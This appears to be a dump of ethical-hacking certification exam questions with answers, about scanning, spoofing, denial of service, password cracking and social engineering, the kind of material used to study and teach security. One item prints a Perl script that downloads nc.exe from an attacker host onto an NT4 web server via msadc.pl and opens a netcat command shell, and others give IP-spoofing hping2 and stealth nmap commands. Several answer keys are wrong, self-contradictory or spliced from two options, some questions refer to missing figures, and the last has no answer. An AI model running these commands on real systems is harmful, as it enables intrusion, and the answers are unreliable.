An nmap command that includes the host specification of 202.176.56-57.* will scan _______number of hosts.A. 512B. 256C. 2D. Over 10,000
A. The hosts with IP address 202.176.56.0-255 & 202.176.56.0-255 will be scanned (256+256=512)
What type of attack is shown in the above diagram?A. Man-in-the-Middle (MiTM) AttackB. Session Hijacking AttackC. SSL Spoofing AttackD. Identity Stealing Attack
A. Man-in-the-Middle (MiTM) attack
Bob has a good understanding of cryptography, having worked with it for many years.Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but itcannot mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns?A. Bob can explain that using passwords to derive cryptographic keys is a form of a programming errorB. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming techniqueC. Bob can explain that a random number generator can be used to derive cryptographic keys butit uses a weak seed value and this is a form of a programming errorD. Bob can explain that using a weak key management technique is a form of programming error
B. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique. A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixedlength buffer and write at least one value outside that buffer's boundaries (usually past its end). Abuffer overflow can occur when reading input from the user into a buffer, but it can also occurduring other kinds of processing in a program. Technically, a buffer overflow is a problem with the program's internal implementation
You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don'tget answered. A basic nmap scan of 192.168.1.10 seems to hang without returning anyinformation.What should you do next?A. Run NULL TCP hping2 against 192.168.1.10B. The firewall is blocking all the scans to 192.168.1.10C. Use NetScan Tools Pro to conduct the scanD. Run nmap XMAS scan against 192.168.1.10
A. Run NULL TCP hping2 against 192.168.1.10
An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn'twant to get caught and is spoofing his IP address. After numerous tries he remains unsuccessfulin connecting to the system. The attacker rechecks that the target system is actually listening onPort 23 and he verifies it with both nmap and hping2. He is still unable to connect to the targetsystem. What could be the reason?A. He is attacking an operating system that does not reply to telnet even when openB. He needs to use an automated tool to telnet inC. He cannot spoof his IP and successfully use TCPD. The firewall is blocking port 23 to that system
C. He cannot spoof his IP and successfully use TCPSpoofing your IP will only work if you don't need to get an answer from the target system. In thiscase the answer (login prompt) from the telnet session will be sent to the "real" location of the IPaddress that you are showing as the connection initiator.
Attacker forges a TCP/IP packet, which causes the victim to try opening a connection with itself.This causes the system to go into an infinite loop trying to resolve this unexpected connection.Eventually, the connection times out, but during this resolution, the machine appears to hang orbecome very slow. The attacker sends such packets on a regular basis to slow down the system.Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks.What type of Denial of Service attack is represented here?A. SMURF AttacksB. LAND attacksC. Targa attacksD. SYN Flood attacks
B. LAND attacks
While testing web applications, you attempt to insert the following test script into the search areaon the company's web site:Afterwards, when you press the search button, a pop up box appears on your screen with the text"Testing Testing Testing". What vulnerability is detected in the web application here?A. A buffer overflowB. Password attacksC. A hybrid attackD. Cross Site Scripting
D. Cross-site scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.
Study the snort rule given below and interpret the rule.alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)A. An alert is generated when a TCP packet originating from any IP address is seen on thenetwork and destined for any IP address on the 192.168.1.0 subnet on port 111B. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111C. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnetD. An alert is generated when a TCP packet is originated from port 111 of any IP address to the192.168.1.0 subnet
A. An alert is generated when a TCP packet originating from any IP address is seen on thenetwork and destined for any IP address on the 192.168.1.0 subnet on port 111
Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learned how to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric was relaying the information between the two. What would you call this attack?A. Man-in-the-middleB. InterceptorC. Poisoning AttackD. Arp Proxy
A. Man-in-the-middleA man-in-the-middle attack ( MITM ) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised
You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 webserver. While it is effective, you find it tedious to perform extended functions. On further researchyou come across a perl script that runs the following msadc functions:system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");$o=; print "Opening ...\n";system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");What kind of exploit is indicated by this script?A. A buffer overflowexploitB. A SUID exploitC. A chained exploitD. A SQL injectionexploitE. A buffer under runexploit
C. A chained exploit
Sabotage, Advertising and Covering are the three stages of _____A. Reverse Software EngineeringB. Social engineeringC. Reverse Social EngineeringD. Rapid Development Engineering
C. Reverse Social EngineeringTypical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.
You are conducting an IdleScan manually using Hping2. During the scanning process, you notice that almost every query increments the IPID - regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Which of the following options would be a possible reason?A. Hping2 cannot be used for idlescanningB. The zombie you are using is not truly idleC. These ports are actually open on the target systemD. A stateful inspection firewall is resetting your queries
B. The zombie you are using is not truly idleIf the IPID is incremented by more than the normal increment for this type of system it means that the system is interacting with some other system beside yours and has sent packets to an unknown host between the packets destined for you.
While performing ping scans into a target network you get a frantic call from the organization's security team. They report that they are under a denial of service attack. When you stop your scan, the smurf attack event stops showing up on the organization's IDS monitors. How can you modify your scan to prevent triggering this event in the IDS?A. Only scan the Windows systemsB. Scan more slowlyC. Spoof the source IP addressD. Do not scan the broadcast IP
D. Do not scan the broadcast IPScanning the broadcast address makes the scan target all IP addresses on that subnet at the same time
While doing a penetration test, you discover that the organization is using one domain for web publishing and another domain for administration and business operations. During what phase of the penetration test would you normally discover this?A. Active AttackB. Port ScanningC. Vulnerability MappingD. Passive Information Gathering
D. Passive information gathering.
Harold is the senior security analyst for a small state agency in New York.He has no other securityprofessionals that work under him, so he has to do all the security-related tasks for theagency.Coming from a computer hardware background, Harold does not have a lot of experiencewith security methodologies and technologies, but he was the only one who applied for the position.Harold is currently trying to run a Sniffer on the agency's network to get an idea of what kind of traffic is being passed around, but the program he is using does not seem to be capturing anything. He pores through the Sniffer's manual, but cannot find anything that directly relates to his problem. Harold decides to ask the network administrator if he has any thoughts on theproblem.Harold is told that the Sniffer was not working because the agency's network is a switched network, which cannot be sniffed by some programs without some tweaking.What technique could Harold use to sniff his agency's switched network?A. Conduct MiTM against the switchB. Launch smurf attack against the switchC. ARP spoof the default gatewayD. Flood the switch with ICMP packets
C. ARP spoof the default gateway.ARP spoofing, also known as ARP poisoning, is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack). The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack).
The terrorist organizations are increasingly blocking all traffic from North America or from Internet Protocol addresses that point back to users who rely on the English language.Hackers sometimes set a number of criteria for accessing their website. This information is shared among the co-hackers. For example if you are using a machine with the Linux operating systemand the Netscape browser then you will have access to their website in a covert way. When federal investigators using PCs running Windows and using Internet Explorer visited the hackers' shared site, the hackers' system immediately mounted a distributed denial-of-service attack against the federal system.Companies today are engaging in tracking competitors' through reverse IP address lookup siteslike whois.com, which provide an IP address's domain. When the competitor visits the company's website they are directed to a products page without discount and prices are marked higher fortheir product. When normal users visit the website they are directed to a page with full-blown product details along with attractive discounts. This is based on IP-based blocking, where certainaddresses are barred from accessing a site.What is this masking technique called?A. Website FilteringB. IP Access BlockadeC. Mirroring WebsiteD. Website Cloaking
D. Website CloakingWebsite Cloaking travels under a variety of alias including Stealth, Stealth scripts, IP delivery,Food Script, and Phantom page technology. It's hot- due to its ability to manipulate those elusive top-ranking results from spider search engines.
You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you know that they are enforcing strong passwords. You understand that all users are required to use passwords that are at least 8 characters in length. All passwords must also use 3 of the 4 following categories: lower case letters, capital letters, numbers and special characters. With your given knowledge of users, likely user account names and the possibility that they will choose the easiest passwords possible, what would be the fastest type of password cracking attack you can run against these hash values to get results?A. Dictionary AttackB. Hybrid AttackC. Brute Force AttackD. Encryption Attack
B. Hybrid AttackA dictionary attack will not work as strong passwords are enforced, also the minimum length of 8 characters in the password makes a brute force attack time consuming. A hybrid attack where you take a word from a dictionary and exchange a number of letters with numbers and special characters will probably be the fastest way to crack the passwords.
Harold works for Jacobson Unlimited in the IT department as the security manager. Harold has created a security policy requiring all employees to use complex 14 character passwords.Unfortunately, the members of management do not want to have to use such long complicated passwords so they tell Harold's boss this new password policy should not apply to them. Tocomply with management's wishes, the IT department creates another Windows domain and moves all the management users to that domain. This new domain has a password policy only requiring 8 characters.Harold is concerned about having to accommodate the managers, but cannot do anything about it.Harold is also concerned about using LanManager security on his network instead of NTLM or NTLMv2, but the many legacy applications on the network prevent using the more secure NTLM and NTLMv2. Harold pulls the SAM files from the DC's on the original domain and the new domain using Pwdump6.Harold uses the password cracking software John the Ripper to crack users' passwords to make sure they are strong enough. Harold expects that the users' passwords in the original domain will take much longer to crack than management's passwords in the new domain. After running the software, Harold discovers that the 14 character passwords only took a short time longer to crack than the 8 character passwords.Why did the 14 character passwords not take much longer to crack than the 8 character passwords?A. Harold should have used Dumpsec instead of Pwdump6B. LanManger hashes are broken up into two 7 character fieldsC. Harold should use LC4 instead of John the RipperD. Harold's dictionary file was not large enough
B. LanManager hashes are broken into two 7 character fields.
Hping2 is a powerful packet crafter tool that can be used to penetrate firewalls by creating custom TCPWhat does the following command do?CEH# hping2 -I eth0 -a10.0.0.6 -s 1037 -p 22 --syn -c 1 -d 0xF00 --setseq 0x0000000f 192.168.0.9A. This command will generate a single TCP UDP packet with source port 1037, destination port15, with a sequence number 22 spoofing the IP address 192.168.0.9B. This command will generate a multiple TCP SYN/ACK packets with source port 22, destinationport 1037, with a sequence number 19 spoofing the IP address 192.168.0.9C. This command will generate multiple TCP SYN packets with source port 1037, destination port22, with a sequence number 15 spoofing the IP address 10.0.0.6D. This command will generate a single TCP SYN packet with source port 1037, destination port22, with a sequence number 15 spoofing the IP address 10.0.0.6
D. This command will generate a single TCP SYN packet with source port 1037, destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6
The programmers on your team are analyzing the free, open source software being used to run FTP services on a server in your organization. They notice that there is excessive number of functions in the source code that might lead to buffer overflow. These C++ functions do not check bounds. Identify the line in the source code that might lead to buffer overflow?A. 20B. 9C. 32D. 35E. 15
E. 15
You are attempting to map out the firewall policy for an organization. You discover your target system is one hop beyond the firewall. Using hping2, you send SYN packets with the exact TTL of the target system starting at port 1 and going up to port 1024. What is this process known as?A. FirewalkingB. Idle scanningC. FootprintingD. Enumeration
A. Firewalking Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map 'open' or 'pass through' ports on a gateway. Moreover, it can determine whether packets with various control information can pass thorugh a given gateway.
Bob waits near a secured door, holding a box. He waits until an employee walks up to the secureddoor and uses the special card in order to access the restricted area of the target company. Justas the employee opens the door, Bob walks up to the employee (still holding the box) and asks theemployee to hold the door open so that he can enter. What is the best way to undermine the socialengineering activity of tailgating?A. Post a sign that states, "no tailgating" next to the special card reader adjacent to the secureddoorB. Issue special cards to access secured doors at the company and provide a one-time only briefdescription of use of the special cardC. Setup a mock video camera next to the special card reader adjacent to the secured doorD. Educate all of the employees of the company on best security practices on a regular, recurringbasis
D. Educate all of the employees of the company on best security practices on a regular, recurring basis.
Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.168.0.1?A. ip.equals 192.168.0.1 and syn.equals onB. ip.addr==192.168.0.1 and tcp.flags.synC. ip.addr = 192.168.0.1 and syn = 1D. ip == 192.168.0.1 and tcp.syn
B. ip.addr==192.168.0.1 and syn.equals on
You are scanning the target network for the first time. You are able to detect few conventional open ports. While attempting to perform conventional service identification by connecting to the open ports, the scan yields either bad or no results. As you are unsure of the protocols in use, you want to discover as many different protocols as possible. Which of the following scan options can help you achieve this?A. Nmap scan with the P (Ping scan) switchB. Nmap with the O (Raw IP packets) switchC. Nessus scan with TCP based pingsD. Netcatscan with the switches
B. Nmap with the O (Raw IP packets) switch.-sO IP protocol scans: This method is used to determine which IP protocols are supported on a host. The technique is to send raw IP packets without any further protocol header to each specified protocol on the target machine. If we receive an ICMP protocol unreachable message, then the protocol is not in use. Otherwise, we assume it's open. Note that some hosts (AIX, HP-UX, Digital UNIX) and firewalls may not send protocol unreachable messages.
You are footprinting the www.xsecurity.com domain using the Google search engine. You wouldlike to determine what sites link to www.xsecurity.com at the first level of relevance.Which of the following operator in Google search will you use to achieve this?A. link:www.xsecurity.comB. search?l:www.xsecurity.comC. pagerank:www.xsecurity.comD. level1:www.xsecurity.com
A. link:www.xsecurity.comThe query [link:] will list webpages that have links to the specified webpage. For instance, [link:www.google.com ] will list webpages that have links pointing to the Google homepage. Note therecan be no space between the "link:" and the web page url .
The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a felony. Section 1 of the Act refers to unauthorized access to computer material. This states that a personcommits an offence if he causes a computer to perform any function with intent to secureunauthorized access to any program or data held in any computer. For a successful convictionunder this part of the Act, the prosecution must prove that the access secured is unauthorized andthat the suspect knew that this was the case. This section is designed to deal with common-orgardenhacking.Section 2 of the Act deals with unauthorized access with intent to commit or facilitate thecommission of further offences. An offence is committed under Section 2 if a Section 1 offencehas been committed and there is the intention of committing or facilitating a further offence (anyoffence which attracts a custodial sentence of more than five years, not necessarily one coveredby the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1offence is still committed.Section 3 offences cover unauthorized modification of computer material, which generally meansthe creation and distribution of viruses. For a conviction to succeed there must have been theintent to cause the modification, and knowledge that the modification had not been authorized.What is this law called?A. Cyber Crime Law Act 2003B. Computer Incident Act 2000C. Computer Misuse Act 1990D. Cyber Space Crime Act 1995
C. Computer Misuse Act 1990.The Computer Misuse Act (1990) creates three criminal offenses: Unauthorized access to computer material; Unauthorized access to a computer system with intent to commit or facilitate the commission of a further offense; Unauthorized modification of computer material.
While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. What can you infer from this observation?A. They are using UNIX based web serversB. They are using Windows based web serversC. They are not using an Intrusion Detection SystemD. They are not using a stateful inspection firewall
D. They are not using a stateful inspection firewall. If they used a stateful inspection firewall, this firewall would know if there had been a SYN-ACK before the ACK.
Clive is conducting a pen-test and has just port scanned a system on the network. He hasidentified the operating system as Linux and been able to elicit responses from ports 23, 25 and53. He infers port 23 as running Telnet service, port 25 as running SMTP service and port 53 asrunning DNS service. The client confirms these findings and attests to the current availability of theservices. When he tries to telnet to port 23 or 25, he gets a blank screen in response. On typingother commands, he sees only blank spaces or underscores symbols on the screen. What are youmost likely to infer from this?A. There is a honeypot running on the scanned machineB. This indicates that the telnet and SMTP server have crashedC. An attacker has replaced the services with trojaned onesD. The services are protected by TCP wrappers
D. The services are protected by TCP wrappers. :TCP Wrapper is a host-based ACL system used to filter network access to Internet protocol services run on (Unix-like) OS's such as Linux or BSD. It allows host or subnetwork IP addresses, names and or ident query replies, to be used as tokens on which to filter for access control purposes.
How does a denial-of-service attack work?A. A hacker uses every character, word, or letter he or she can think of to defeat authenticationB. A hacker prevents a legitimate user (or group of users) from accessing a serviceC. A hacker tries to decipher a password by using a system, which subsequently crashes the networkD. A hacker attempts to imitate a legitimate user by confusing a computer or even another person
B. A hacker prevents a legitimate user or group of users from accessing a service. In computer security a DOS is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB)
A digital signature is simply a message that is encrypted with the public key instead of the private key.A. TrueB. False
B. False. Digital signatures enable the recipient of information to verify the authenticity of the information's origin, and also verify that the information is intact. Thus, public key digital signatures provide authentication and data integrity. A digital signature also provides non-repudiation. Instead of encrypting information using someone else's public key, you encrypt it with your private key. If the information can be decrypted with your public key, then it must have originated with you.
John is the network administrator for Frederickson Machinery in Tampa, Florida. Frederickson Machinery has one large office, and a number of smaller offices spread out around the city. John'sprimary responsibility is to oversee the network equipment hat includes switches, routers, gateways and firewalls. John is the only employee allowed to make any changes or troubleshootthe network equipment so he has to run to any of the offices himself whenever there are anynetwork issues. John is becoming more and more busy, so he wants to be able to remotely manage the network equipment as much as possible. He does not want to use telnet because ofits inherent security flaws, so he decides to use SSH. John downloads a program from the Internet for SSH connections and attempts to connect to one of his routers at another office. After a short time, the following screen pops up on his computer:Why was John not able to connect?A. He needs to turn off stateful inspection on his firewallsB. He needs to open port 24 on his firewallsC. He needs to open port 22 on his firewallsD. Putty cannot make SSH connections
C. He needs to open port 22 on his firewalls.
Snort is an open source Intrusion Detection System. However, it can also be used for a few otherpurposes such as a sniffer. Which of the choices below are the proper features offered by Snort?A. IDS, Packet Logger, SnifferB. IDS, Sniffer, content inspectorC. IDS, Sniffer, ProxyD. IDS, Firewall, Sniffer
A. IDS, Packet Logger, SnifferSnort is a free software NIDS and NIPS capable of performing packet logging and real-time traffic analysis on IP networks. Snort was written by Martin Roesch, but is now owned and developed by Sourcefire.
John wants to try a new hacking tool on his Linux system. As the application comes from a site in his untrusted zone, John wants to ensure that the downloaded tool has not been Trojaned. Which of the following options would indicate the best course of action for John?A. Compare the file's virus signature with the one published on the distribution mediaB. Compare the file's MD5 signature with the one published on the distribution mediaC. Obtain the application via SSLD. Obtain the application from a CD-ROM disc
B. Compare the file's MD5 signature with the one published on the distribution media. MD5 takes as input a message of arbitrary length and produces as output a 128-bit "fingerprint" or message digest of the input. It is conjectured that it is computationally infeasible to produce two messages having the same message digest, or to produce any message havin ga given prespecified target message digest. The MD5 algorithm is intended for digital signature applications, where a large file must be compressed in a secure manner before being encrypted with a private (secret) key under a public-key cryptosystem such as RSA. In essence, MD5 is a way to verify data integrity and is much more reliable than checksum and many other commonly used methods.
An attacker has successfully compromised a remote computer. Which of the following comes asone of the last steps that should be taken to ensure that the compromise cannot be traced back tothe source of the problem?A. Install patchesB. Setup a backdoorC. Install a zombie for DDOSD. Cover your tracks
D. Cover your tracks.
John is using a special tool on his Linux platform that has a database containing signatures to beable to detect hundreds of vulnerabilities in UNIX, Windows, and commonly used web CGI scripts.Moreover, the database detects DDoS zombies and Trojans as well. What would be the name of this tool?A. hping2B. nessusC. makeD. nmap
B. nessus. Nessus is the world's most popular vulnerability scanner. Nmap is used only for scanning, not detecting vulnerabilities. Hping is a free packet generator and analyzer for the TCP/IP protocol. Make is used to automatically build large applications on the *nix platform.
You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22.What filter will you apply?A. ip = 10.0.0.22B. ip.equals 10.0.0.22C. ip.address = 10.0.0.22D. ip.src == 10.0.0.22
D. ip.src == 10.0.0.22ip.src tells the filter to only show packets with 10.0.0.22 as the source.
Eve decides to get her hands dirty and tries out a Denial of Service attack that is relatively new to her. This time she envisages using a different kind of method to attack Brownies Inc. Eve tries to forge the packets and uses the broadcast address. She launches an attack similar to that of "fraggle". What is the technique that Eve used in the case above?A. Ping of DeathB. SmurfC. SYN FloodD. Bubonic
B. Smurf. A fraggle attack is a variation on the Smurf attack for DOS in which the attacker sends spoofed UDP packets instead of ICMP echo reply (ping) packets to the broadcast address of a large network.
When referring to the Domain Name Service, what is a 'zone'?A. It is a collection of domainsB. It is the first resource record type in the SOAC. It is the first domain that belong to a companyD. It is a collection of resource records
D. It is a collection of resource records. A reasonable definition of a zone would be a portion of the DNS namespace where responsibility has been delegated.
James is the lone IT technician for a small advertising agency in the Midwest. He oversees threeservers and fifteen workstations all running Windows operating systems. James just got back froma Hacker Halted conference and is now very concerned about the security of his network.Previously he thought that no one would be interested in his small company's data, but now he thinks otherwise. His budget is very limited and he cannot afford any kind of commercial IDS or IPS system.James is looking for a freeware or easy-to-use open source program that will help him to detect port scans on his workstations and servers.What should James use?A. GFI LANGuardB. SnortC. NmapD. Genius
B. Snort.
What is the most common vehicle for social engineering attacks?A. Direct in personB. Peer to Peer networksC. Local Area NetworksD. Email
A. Direct in person Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a targetto release information or perform an action and is usually done over the telephone.
Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because therewere no proper boundary checks being conducted, Bob decided to insert 400 characters into the200-character buffer. (Overflows the buffer). Below is the code snippet:Void func (void){int I; char buffer [200];for (I=0; I<400; I++)buffer [I]= 'A';return;}How can you protect/fix the problem of your application as shown above?A. Because the counter starts with 0, we would stop when the counter is more than 200B. Add a separate statement to signify that if we have written 200 characters to the buffer, thestack should stop because it cannot hold any more dataC. Add a separate statement to signify that if we have written less than 200 characters to thebuffer, the stack should stop because it cannot hold any more dataD. Because the counter starts with 0, we would stop when the counter is less than 200
B, DI-199 would be the character number 200. The stack holdes exactly 200 characters so there is no need to stop before 200.
SSL has been seen as the solution to a lot of common security problems. Administrator will oftentime make use of SSL to encrypt communications from points A to point B. Why do you think thiscould be a bad idea if there is an Intrusion Detection System deployed to monitor the trafficbetween point A and B?A. SSL will slow down the IDS while it is breaking the encryption to see the packet contentB. SSL is redundant if you already have IDS's in placeC. SSL will mask the content of the packet and Intrusion Detection System are blindedD. SSL will trigger rules at regular interval and force the administrator to turn them off
C. SSL will mask the content of the packet and IDS's are blinded. An IDS will not be able to evaluate the content in teh packets if it is encrypted.
Jacob would like your advice on using a wireless hacking tool that can save him time and get himbetter results with lesser packets. You would like to recommend a tool that uses KoreK'simplementation. Which tool would you recommend from the list below?A. AircrackB. KismetC. John the RipperD. Shmoo
A. Aircrack. Aircrack network software suite consists of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic.John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (11 architecture-specific flavors of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker.Shmoo is an organization (AirSnort, Rainbow Tables, etc. are some of Shmoo's "brainchildren")
Bob is acknowledged as a hacker of repute and is popular among visitors of 'underground' sites.Bob is willing to share his knowledge to those who are willing to learn, and many have expressedtheir interest in learning from him.However, this knowledge has risks associated with it, as the same knowledge can be used formalevolent attacks as well. In this context, what would be the most effective method to bridge theknowledge gap between the "black" hats or crackers and the "white" hats or computer securityprofessionals?A. Hire more computer security monitoring personnel to monitor computer systems and networksB. Make obtaining either a computer security certification or accreditation easier to achieve somore individualsfeel that they are a part of something larger than lifeC. Train more national guard and reservist in the art of computer security to help out in times ofemergency or crisesD. Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards
D. Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards. Bridging the gap would consist of educating the white hats and the black hats equally so that theirknowledge is relatively the same. Using books, articles, the internet, and professional training seminars is a way of completing this goal.
Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the external gateway interface. Further inspection reveals theyare not responses from internal hosts' requests but simply responses coming from the Internet.What could be the likely cause of this?A. Someone spoofed Clive's IP address while doing a smurf attackB. Someone spoofed Clive's IP address while doing a land attackC. Someone spoofed Clive's IP address while doing a DoS attackD. Someone spoofed Clive's IP address while doing a fraggle attack
A. Someone spoofed Clive's IP address while doing a smurf attackThe smurf attack, named after its exploit program, is a denial-of-service attack that uses spoofed broadcast ping messages to flood a target system. In such an attack, a perpetrator sends a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, hundreds of machines might reply to each packet.
_____ is found in all versions of NTFS and is described as the ability to fork file data into existingfiles without affecting their functionality, size, or display to traditional file browsing utilities like dir orWindows ExplorerA. Merge StreamsB. SteganographyC. Alternate Data StreamsD. NetBIOS vulnerability
C. Alternate Data StreamsADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streamsand the data streams are accessed by filename :stream .
Wardialing is one of the oldest methods of gaining unauthorized access to the targeted systems, itis one of the dangers most commonly forgotten by network engineers and system administrators.A hacker can sneak past all the expensive firewalls and IDS and connect easily into the network.Through wardialing, an attacker searches for the devices located in the target networkinfrastructure that are also accessible through the telephone line.'Dial backup' in routers is most frequently found in networks where redundancy is required. Dial-on-demand routing (DDR) is commonly used to establish connectivity as a backup.As a security tester, how would you discover what telephone numbers to dial-in to the router?A. Run a war-dialing tool with range of phone numbers and look for CONNECT responseB. Connect using ISP's remote-dial in number since the company's router has a leased line connection established with themC. Search the Internet for leakage oftarget company's telephone number to dial-inD. Brute force the company's PABX system to retrieve the range of telephone numbers to dial-in
A. Run a war dialing tool iwht range of phone numbers and look for CONNECT response. Programs like TONELOC allow you scan a range of phone numbers.
Jim was having no luck performing a penetration test on his company's network. He was runningthe test from home and had downloaded every security scanner he could lay his hands on.Despite knowing the IP range of all of the systems, and the exact network configuration, Jim wasunable to get any useful results. Why is Jim having these problems?A. Security scanners are not designed to do testing through a firewallB. Security scanners cannot perform vulnerability linkageC. Security scanners are only as smart as their database and cannot find unpublishedvulnerabilitiesD. All of the above
D. All of the above. The Security scanners available online are often too "outdated" to perform a live pentest against avictim.
You are concerned that someone running PortSentry could block your scans, and you decide toslow your scans so that no one detects them. Which of the following command will help youachieve this?A. nmap -sO -PT -O -C5 B. nmap -sF -PT -PI -O C. nmap -sS -PT -PI -O -T1 D. nmap -sF -P0 -O
C. nmap -sS -PT -PI -O -T1 - T[ 0-5]:Settimingtemplate(higherisfaster)
Why would an attacker want to perform a scan on port 137?A. To disrupt the NetBIOS SMB service on the target hostB. To discover proxy servers on a networkC. To check for file and print sharing on Windows systemsD. To discover information about a target host using NBTSTAT
D. To discover information about a target host using NBTSTAT. Microsoft encapsulates netbios information within TCP/IP using ports 135-139. It is trivial for an attacker to issue the following command: nbtstat -A (yourIPaddresshere)from their Windows machine and collect information about your Windows machine (if you are not blocking traffic to port 137 at your borders.)
On a backdoored Linux box there is a possibility that legitimate programs are modified or trojaned.How is it possible to list processes and uids associated with them in a more reliable manner?A. Use "ps"B. Use "netstat"C. Use "lsof"D. Use "echo"
C. Use "lsof"lsof is a command used in many Unix-like systems that is used to report a list of all open files and the processes that opened them. It works in and supports several UNIX flavors.
You are the IT manager of a large legal firm in California. Your firm represents many importantclients whose names always must remain anonymous to the public. Your boss, Mr. Smith, isalways concerned about client information being leaked or revealed to the press or public. Youhave just finished a complete security overhaul of your information systems including an updatedIPS, new firewalls, email encryption, and employee security awareness training. Unfortunately,many of your firm's clients do not trust technology to completely secure their information, socouriers routinely have to travel back and forth, to and from the office with sensitive information. Your boss has charged you with figuring out how to secure the information the couriers musttransport. You propose that the data be transferred using burned CD's or USB flash drives. Youinitially think of encrypting the files, but decide against that method for fear the encryption keys could eventually be broken?What software application could you use to hide the data on the CD's and USB flash drives?A. File snuffB. SnowC. EFSD. File sneaker
B. Snow. Snow software will insert extra spaces at the end of each line. Three bits are encoded in each line by adding between 0 and 7 spaces that are ignored by most display programs, including web browsers.
SNMP is a connectionless protocol that uses UDP instead of TCP packets (True or False)A. TrueB. False
A. TrueTCP and UDP provide transport services, but UDP was preferred, due to TCP characteristics. TCP is a complicated protocol, and it consumes a lot of memory and CPU resources. UDP is easy to build and run, and vendors have built a simple version of IP and UDP into devices including repeaters and modems.
Steven, a security analyst for XYZ associates, is analyzing packets captured by Ethereal on aLinux server inside his network when the server starts to slow down tremendously. Steven examines the following Ethereal capture: (see graphic)A. SYN floodB. ARP spoofingC. Smurf attackD. Ping of Death
C. Smurf attack.A perpetrator is sending a large quantity of ICMP echo traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will tak the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding.
You are performing a port scan with nmap. You are in hurry and conducting the scans at the fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not anissue, what type of scan should you run to get very reliable results?A. Stealth scanB. Fragmented packet scanC. Connect scanD. XMAS scan
